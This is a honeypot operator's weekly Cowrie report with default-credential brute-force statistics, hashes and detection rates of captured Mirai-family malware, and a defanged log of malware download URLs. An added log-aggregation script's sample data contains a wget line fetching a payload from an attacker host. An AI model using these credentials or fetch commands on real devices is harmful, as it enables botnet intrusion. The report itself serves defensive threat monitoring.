Honeypot Observation Records

Honeypotter SugitaMuchi's Blog

Honeypot Observation Record [10]

A brief report from day 35 of running Cowrie.

Here are the aggregated results for the most recent 7 days.

Dashboard and aggregated results

Dashboard
※Aggregation period: 2018/09/08 to 2018/09/15
[Dashboard screenshots: map (event), pie (country), graph (protocol); graph (username), graph (password)]


■Login attempts ( username )
※Aggregation period: 2018/09/08 to 2018/09/15
※From aggregated logs
※Top 10

Attempts username
2878 root
1389 admin
981 default
97 support
66 guest
64 telnetadmin
55 telecomadmin
47 user
39 telnet
36 e8telnet

■Login attempts ( password )
※Aggregation period: 2018/09/08 to 2018/09/15
※From aggregated logs
※Top 10

Attempts password
551 password
449 default
320 (non pass)
271 admin
270 taZz@23495859
182 OxhlwSG8
161 vizxv
148 123456
143 ,ba234
134 xc3511

■Login attempts ( username / password )
※Aggregation period: 2018/09/08 to 2018/09/15
※From aggregated logs
※Top 10

Attempts username / password
460 admin / password
303 root / taZz@23495859
292 default / default
260 admin / admin
201 root / default
199 default / OxhlwSG8
188 root / vizxv
184 root / (non pass)
160 admin / ,ba234
152 root / xc3511

About the downloaded malware

■Downloaded files
※Aggregation period: 2018/09/08 to 2018/09/15

There were 44 distinct files in total.

(stdin): b33b30c3cc7e027320e4d203303cc36a4e84b44451278bbb524ec54d5f61a4d6: ASCII text, with very long lines
(stdin): b986a2795479b4aacf6dafa6654914ca11d9b4a260a35f1369e262f4e948e841: ELF 32-bit LSB executable, ARM, version 1, statically linked, stripped
(stdin): e52c66d71e50541d19c651353d481f21363f5674636ca0917b1d908777ee947d: ASCII text
(stdin): f6c1795623605f8543224ecb5b29fa336b5c80be48ed2f3690114b8e709780f1: POSIX shell script, ASCII text executable
.shinka.x86: 67f2ccf38f9de4a915f0445538353dc2ff1a397950783a7d025c231b3265b374: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
.shinka.x86: 6c6f0aa1e5aa53d116da6d1986f3a690e18c5b1f65344da67ba78dfb9705251e: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
.shinka.x86: 9d43513c0714e9e1e5287a0889496e5577c751249c113f8da4b92902194cc7e3: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
.shinka.x86: 9e6251101ea2345dbf493137195fb4ebe1a2ac8b07156c9fa43c6320c6a62710: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
8x868: 85efb26738828400bc6fcced4b173f3e718e90287e55c262adf6aa21e26216aa: ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, stripped
BleedStreet.x86: 5bea1307348853717000ee7e342ed654650a4df83e058668f3abad2aa355be28: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
Josho.x86: 21c01e4620e3d9ee371361b61291df6c652ac21cbd8ab4378753a76627839be8: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
Josho.x86: 5d0356caa3e5c4ba59cf6fcc2e7a389a677df61c5643b36b7e8af9383b18c0a4: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
Josho.x86: 8a33d0be8144a57b9d6ca32752ff369c2eab8eba68afc47af5c120b21c7790e3: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
Josho.x86: a8845f60705134da044737b675c835c71cb5227f74133badf5fcf7a2e3f4d216: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
Josho.x86: b7a7a7078856e2f72867a1a648aed422edef0ba43caf1bc108028d17e6c40f35: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
Josho.x86: c884357b1dde184825fbdc40bec947cef51214ead981c853b9d6f2e614c3335f: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
KEIJI.sh: c267da9c09ad1b3a7f975cc83cbf616b08ad1f38a4ce98bb7b9f4176e79b25f8: Bourne-Again shell script, ASCII text executable
Owari.x86: 2fef9a7c9499184ae82a5769a98d62bf9d87a89fb8b704af9b731517e9d791b2: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
Owari.x86: 9c021013e3cc84f3d5c973fccb2375b557279d5398de7719dc0b07e19b8517c9: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
Owari.x86: b96998410aa93bc0fd0edf954084603e0faa875a231225d4ec2cbad9ce86ba06: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
VMuXsHnwExtFaDtPptEA: 812f2280e5f6e260045cc7893252cdeff1de2a624345811cb273bcce3dbcc2aa: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, stripped
apep.x86: 63b6d3d31a6544ed9fada64750a86d17defe5f519fc5bd3cd38d8325a0eebab8: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
apep.x86: a448a8b8fd5a7fa0663132ef49e9ca779b87ba19098e1463c9fd833399467364: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
apep.x86: acf3d93bd1ab28ed4a7974fc87f65cf957b397e481c46774c67d99c56bb25a74: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
bins.sh: 856a9ddc67362b167bb12e1fd54741afb0d7da0537f3ca9cfe63463a21cd044a: POSIX shell script, ASCII text executable
gemini.x86: 33dbdfc373fb19891723842c468d8f3dc62f04573d63f3e9ebb9f7d2b93cb0bc: ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, stripped
gemini.x86: c9e9deeada1d9f290619d097ec621974d43f7c5ad721b6aa07e636b759680128: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
hoderi.x86: b72252f224177cdf05247d29ebd9072f39e0ed82e3be4894a817378a0def56a6: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
hoho.x86: 069d2fd608b734b10a77abd43e416135778f9632fe09f6dc225c104df954c721: ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, stripped
hoho.x86: 31b40737fc062be95dee8f31615a852d3e272e9f2a74974867868297f934cc46: ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, stripped
kohan.x86: 98ea5e44fbfaaabc35d1d8cebe6cfa715b49a278f604991067e984c1bb85390e: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
miori.x86: 12a4775fce7e59ce2a71e7f4de07debeba6e534e1c256870ca576cabbb35affd: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, stripped
miori.x86: 58d2db0bc8d93a30101eb87ef28c7dbf1af61ae2ebc355f6a236ab594a236f4b: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, stripped
miori.x86: 8036b03dab8fa66d8727d75ffde5a8546c5d51da1b29d50eaaa12bdae1c6cec6: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, stripped
miori.x86: c65e5614b0d4c7df409c0c0c1f2072c5f4a138886f232cadd935df5b151b23c6: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, stripped
neko.x86: 170fa7be45644cb7d114864f92de96965ffc1ef574702a6689b551b625f53ef3: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, stripped
nsfw.x86: 24ff67030f052b88e9ed60527aa7e415ca86175afa805253189bdd604b043117: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
nsfw.x86: 44efc8363b2af1e0afe7a989e1998808998e7e493cabf9ee4aced3b0e2a181ca: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
nsfw.x86: 753529554ce6b99d149c16d1732e28a9d1738d91d5a4ed462d66005763e25435: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
skid.x86: ef1da03ab39be91fd765ae491df3267890fcb051d8aabb9d17d2262cf185ccf0: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
telnet.sh: dc5c7e90d5e03bb48ee085bc647adf6887a56f9a8030dadb6c928d5e9fba140b: Bourne-Again shell script, ASCII text executable
w.sh: 337706eb90fbd0350469bfb251a184203549bfd353b387d86845feabceccde17: Bourne-Again shell script, ASCII text executable
x86.nigger: a183e78424bf562356959e396fe81a5d6eb2b3cdffd80c3945ce03102f1ccc2a: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
x86.yakuza: ed0ce784f02a9378c8db4d3e7cef513f5fb0e722d01e03a42b849c3ff5755bf4: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped

■Detection status
※The hash values do not fit in the table, so they are abbreviated.

filename sha256 VT detection Notes
(stdin) b33b30c3cc... detection rate: 27 / 58 Backdoor
(stdin) b986a27954... detection rate: 32 / 59 Backdoor
(stdin) e52c66d71e... detection rate: 7 / 58 Downloader
(stdin) f6c1795623... detection rate: 2 / 58 Downloader
.shinka.x86 67f2ccf38f... detection rate: 19 / 59 Mirai
.shinka.x86 6c6f0aa1e5... detection rate: 9 / 59 Mirai
.shinka.x86 9d43513c07... detection rate: 9 / 59 Mirai
.shinka.x86 9e6251101e... detection rate: 9 / 59 Mirai
8x868 85efb26738... - -
BleedStreet 5bea130734... detection rate: 28 / 59 Mirai
Josho.x86 21c01e4620... - -
Josho.x86 5d0356caa3... detection rate: 25 / 59 Mirai
Josho.x86 8a33d0be81... detection rate: 28 / 59 Mirai
Josho.x86 a8845f6070... detection rate: 26 / 59 Mirai
Josho.x86 b7a7a70788... detection rate: 26 / 59 Mirai
Josho.x86 c884357b1d... detection rate: 18 / 58 Mirai
KEIJI.sh c267da9c09... detection rate: 25 / 59 Mirai
Owari.x86 2fef9a7c94... detection rate: 24 / 58 Mirai
Owari.x86 9c021013e3... detection rate: 25 / 59 Mirai
Owari.x86 b96998410a... detection rate: 24 / 59 Mirai
VMuXsHnwExtFaDtPptEA 812f2280e5... detection rate: 14 / 59 Mirai
apep.x86 63b6d3d31a... detection rate: 8 / 59 Mirai / Hajime
apep.x86 a448a8b8fd... detection rate: 20 / 59 Mirai / Hajime
apep.x86 acf3d93bd1... detection rate: 11 / 58 Mirai / Hajime
bins.sh 856a9ddc67... detection rate: 17 / 59 Mirai
gemini.x86 33dbdfc373... detection rate: 23 / 59 Mirai
gemini.x86 c9e9deeada... detection rate: 21 / 58 Mirai
hoderi.x86 b72252f224... detection rate: 19 / 58 Mirai / Hajime
hoho.x86 069d2fd608... detection rate: 21 / 59 Mirai
hoho.x86 31b40737fc... detection rate: 24 / 59 Mirai
kohan.x86 98ea5e44fb... detection rate: 24 / 59 Mirai
miori.x86 12a4775fce... detection rate: 17 / 58 Mirai
miori.x86 58d2db0bc8... detection rate: 16 / 59 Mirai
miori.x86 8036b03dab... detection rate: 4 / 58 Mirai
miori.x86 c65e5614b0... detection rate: 14 / 59 Mirai
neko.x86 170fa7be45... detection rate: 17 / 59 Mirai
nsfw.x86 24ff67030f... detection rate: 17 / 59 Mirai
nsfw.x86 44efc8363b... detection rate: 22 / 59 Mirai
nsfw.x86 753529554c... detection rate: 16 / 59 Mirai
skid.x86 ef1da03ab3... detection rate: 12 / 59 Mirai
telnet.sh dc5c7e90d5... detection rate: 19 / 59 Mirai
w.sh 337706eb90... detection rate: 25 / 59 Mirai
x86.nigger a183e78424... detection rate: 11 / 59 Mirai
x86.yakuza ed0ce784f0... detection rate: 27 / 59 Mirai

※Entries whose filename is (stdin) came in via standard input.

※The following did not hit in a VirusTotal search, so I uploaded the files to VirusTotal.

■Before upload

filename sha256 VT detection Notes
8x868 85efb26738... - -
Josho.x86 21c01e4620... - -


■After upload

filename sha256 VT detection Notes
8x868 85efb26738... detection rate: 6 / 58 Gafgyt
Josho.x86 21c01e4620... detection rate: 18 / 58 Mirai


Hajime-looking samples have been mixed in since last week, and this time I saw many cases of malware code being pushed in via standard input.

Also, including the ones above, this week I uploaded about four samples that did not hit in a VT search.


■Download log
※These are dangerous; do not connect to them.

703 Downloaded URL (hxxp://159[.]65[.]232[.]56:80/bins/apep[.]x86)
292 Downloaded URL (hxxp://185[.]244[.]25[.]176:80/bins/gemini[.]x86)
163 Downloaded URL (hxxp://159[.]89[.]226[.]151:80/bins/VPNFilter[.]x86)
137 Downloaded URL (hxxp://185[.]244[.]25[.]165:80/AB4g5/Josho[.]x86)
123 Downloaded URL (hxxp://80[.]211[.]57[.]80:80/miori[.]x86)
108 Downloaded URL (hxxp://159[.]65[.]232[.]56:80/bins/hoderi[.]x86)
106 Downloaded URL (hxxp://104[.]248[.]56[.]235:80/AB4g5/Josho[.]x86)
105 Downloaded URL (hxxp://46[.]29[.]163[.]28:80/kohan[.]x86)
102 Downloaded URL (hxxp://159[.]203[.]163[.]26:80/Binarys/Owari[.]x86)
76 Downloaded URL (hxxp://209[.]141[.]42[.]153:80/bins/sora[.]x86)
67 Downloaded URL (hxxp://217[.]61[.]6[.]155:80/gaybub/miori[.]x86)
60 Downloaded URL (hxxp://103[.]60[.]15[.]2:80/Binarys/Owari[.]x86)
55 Downloaded URL (hxxp://159[.]89[.]183[.]176:80/AB4g5/Josho[.]x86)
48 Downloaded URL (hxxp://74[.]91[.]126[.]105/w[.]sh)
46 Downloaded URL (hxxp://195[.]181[.]218[.]107:80/bins/nsfw[.]x86)
39 Downloaded URL (hxxp://165[.]227[.]129[.]7:80/AB4g5/Josho[.]x86)
32 Downloaded URL (hxxp://46[.]17[.]40[.]236/KEIJI[.]sh)
27 Downloaded URL (hxxp://128[.]199[.]197[.]79:80/bins/[.]shinka[.]x86)
21 Downloaded URL (hxxp://46[.]29[.]160[.]250:80/bins/hoho[.]x86)
21 Downloaded URL (hxxp://206[.]189[.]144[.]202:80/bins/[.]shinka[.]x86)
20 Downloaded URL (hxxp://167[.]99[.]34[.]197:80/bins/x86[.]nigger)
14 Downloaded URL (hxxp://142[.]93[.]28[.]248:80/bins/hoho[.]x86)
14 Downloaded URL (hxxp://142[.]93[.]196[.]48/lod[.]sh)
13 Downloaded URL (hxxp://185[.]244[.]25[.]138:80/Binarys/Owari[.]x86)
10 Downloaded URL (hxxp://159[.]65[.]233[.]89:80/AB4g5/Josho[.]x86)
4 Downloaded URL (hxxp://128[.]199[.]197[.]79:80/bins/x86[.]skid)
4 Downloaded URL (hxxp://128[.]199[.]197[.]79:80/bins/skid[.]x86)
3 Downloaded URL (hxxp://159[.]89[.]183[.]176:80/vi/x86[.]yakuza)
2 Downloaded URL (hxxp://89[.]203[.]249[.]183:80/bins/owari[.]x86)
2 Downloaded URL (hxxp://80[.]211[.]112[.]95:80/bins/BleedStreet[.]x86)
1 Downloaded URL (hxxp://89[.]34[.]237[.]107/bins[.]sh)
1 Downloaded URL (hxxp://211[.]143[.]198[.]172:780/lvn3/eU)
1 Downloaded URL (hxxp://211[.]143[.]198[.]172:780/VMuXsHnwExtFaDtPptEA)
1 Downloaded URL (hxxp://206[.]189[.]172[.]75:80/neko[.]x86)
1 Downloaded URL (hxxp://178[.]128[.]249[.]30/bins[.]sh)
1 Downloaded URL (hxxp://168[.]235[.]82[.]212:80/bins/gemini[.]x86)
1 Downloaded URL (hxxp://159[.]89[.]154[.]52:80/8x868)
1 Downloaded URL (hxxp://159[.]203[.]163[.]26:80/AB4g5/Josho[.]x86)
1 Downloaded URL (hxxp://158[.]69[.]60[.]239/bins[.]sh)
1 Downloaded URL (hxxp://138[.]197[.]74[.]100/bins[.]sh)
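The tables in this report (username / password pairs, downloaded URLs, and the count of distinct files) are what you get by aggregating Cowrie's JSON log. The script below is an added example written for this page, not the blog author's tooling; it assumes Cowrie's cowrie.json field names (eventid, username, password, url, shasum), uses constructed log lines with documentation IPs and placeholder hashes, and defangs URLs the way this post does (hxxp://, [.]) so the aggregated output can be published without anyone clicking a live malware URL by accident.

```python
"""Aggregate a Cowrie JSON log into the figures this weekly report publishes:
top username / password pairs, top downloaded URLs (defanged), and the number
of distinct samples by SHA-256.

Assumptions (not from the blog post): field names follow Cowrie's cowrie.json
format (eventid, username, password, url, shasum). The log lines below are
constructed for this example.
"""
import json
import re
from collections import Counter

LOGIN_EVENTS = {"cowrie.login.failed", "cowrie.login.success"}
DOWNLOAD_EVENT = "cowrie.session.file_download"

# Constructed sample log (documentation IPs, placeholder hashes); one JSON object per line.
SAMPLE_LOG = """\
{"eventid":"cowrie.login.failed","username":"root","password":"taZz@23495859","src_ip":"198.51.100.7"}
{"eventid":"cowrie.login.failed","username":"root","password":"taZz@23495859","src_ip":"198.51.100.8"}
{"eventid":"cowrie.login.failed","username":"admin","password":"password","src_ip":"198.51.100.9"}
{"eventid":"cowrie.login.success","username":"root","password":"","src_ip":"203.0.113.5"}
{"eventid":"cowrie.command.input","input":"cd /tmp; wget http://203.0.113.50:80/bins/example.x86","src_ip":"203.0.113.5"}
{"eventid":"cowrie.session.file_download","url":"http://203.0.113.50:80/bins/example.x86","shasum":"sha256-placeholder-A","src_ip":"203.0.113.5"}
{"eventid":"cowrie.session.file_download","url":"http://203.0.113.50:80/bins/example.x86","shasum":"sha256-placeholder-A","src_ip":"203.0.113.6"}
{"eventid":"cowrie.session.file_download","url":"http://203.0.113.60/w.sh","shasum":"sha256-placeholder-B","src_ip":"203.0.113.7"}
not json: a truncated or corrupt line must not abort the whole aggregation
"""


def parse_events(text):
    """Return one dict per well-formed JSON line; malformed lines are skipped."""
    events = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        try:
            events.append(json.loads(line))
        except json.JSONDecodeError:
            continue  # a corrupt line should not abort the whole aggregation
    return events


def top_credentials(events, n=10):
    """Count username / password pairs over login attempts (the third table above).
    Cowrie records an empty password as ""; the report labels it "(non pass)"."""
    counts = Counter()
    for ev in events:
        if ev.get("eventid") in LOGIN_EVENTS:
            password = ev.get("password") or "(non pass)"
            counts[(ev.get("username", ""), password)] += 1
    return counts.most_common(n)


def top_field(events, field, n=10):
    """Single-column version for the username and password tables."""
    counts = Counter()
    for ev in events:
        if ev.get("eventid") in LOGIN_EVENTS:
            value = ev.get(field) or ("(non pass)" if field == "password" else "")
            counts[value] += 1
    return counts.most_common(n)


def defang(url):
    """hxxp:// and [.] so a published URL is neither clickable nor resolvable
    by accident (the convention used in the download log above)."""
    return re.sub(r"^http", "hxxp", url).replace(".", "[.]")


def top_download_urls(events, n=10):
    """Count download URLs, returning (count, defanged_url) like the download log."""
    counts = Counter(ev["url"] for ev in events
                     if ev.get("eventid") == DOWNLOAD_EVENT and ev.get("url"))
    return [(count, defang(url)) for url, count in counts.most_common(n)]


def distinct_samples(events):
    """Set of SHA-256 values seen in downloads; its size is the 'distinct files' figure."""
    return {ev["shasum"] for ev in events
            if ev.get("eventid") == DOWNLOAD_EVENT and ev.get("shasum")}


if __name__ == "__main__":
    import sys
    # Pass a real cowrie.json path as argv[1]; without one the constructed sample is used.
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_LOG
    events = parse_events(text)
    print("username / password")
    for (user, pw), count in top_credentials(events):
        print(f"{count:>5} {user} / {pw}")
    print("\nDownloaded URLs (defanged)")
    for count, url in top_download_urls(events):
        print(f"{count:>5} Downloaded URL ({url})")
    print(f"\n{len(distinct_samples(events))} distinct samples")
```

Counting by the shasum field rather than by URL is what separates "44 distinct files" from the much larger number of download events: the same URL is fetched hundreds of times, and the same binary is served from several hosts under different paths.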


That's how things looked this time.
End